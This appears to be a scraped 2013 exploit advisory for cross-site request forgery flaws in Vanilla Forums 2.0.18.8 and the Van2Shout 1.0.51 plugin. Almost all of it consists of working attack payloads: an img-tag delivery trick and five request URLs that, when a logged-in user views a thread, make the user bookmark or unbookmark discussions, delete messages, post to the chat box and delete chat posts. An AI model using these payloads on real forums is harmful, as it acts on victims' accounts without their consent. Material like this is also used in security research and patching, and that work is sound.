44 lines
No EOL
1 KiB
Text
44 lines
No EOL
1 KiB
Text
# Exploit Title:
|
|
Vanilla Forums <= 2.0.18.8 & Van2Shout 1.0.51 Multiple CSRF
|
|
|
|
# Google Dork: n/a
|
|
# Date: 13/4/13
|
|
# Exploit Author: Henry Hoggard
|
|
# Vendor Homepage: [http://vanillaforums.org/ ,
|
|
http://vanillaforums.org/addon/van2shout-plugin]
|
|
# Software Link: [http://vanillaforums.org/download,
|
|
http://vanillaforums.org/get/van2shout-plugin-1.051]
|
|
# Version: [2.0.18.8 , 1.0.51]
|
|
# Tested on: [Debian]
|
|
# CVE :
|
|
|
|
=======================
|
|
|
|
You can exploit these by having the user visit a thread with the img src
|
|
of the below urls.
|
|
|
|
eg <img
|
|
src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
|
|
1337 is the id.
|
|
|
|
|
|
|
|
Bookmark CSRF:
|
|
|
|
http://site.org/index.php=/vanilla/discussion/bookmark/1337
|
|
|
|
UnBookmark CSRF
|
|
|
|
http://site.org/index.php=/vanilla/discussion/bookmark/1337?
|
|
|
|
Delete Message CSRF
|
|
|
|
http://site.org/index.php=/messages/clear/1337
|
|
|
|
Post to Van2Shout Chat Box CSRF
|
|
|
|
http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage
|
|
|
|
Delete Message from Van2Shout Chatbox CSRF
|
|
|
|
http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337 |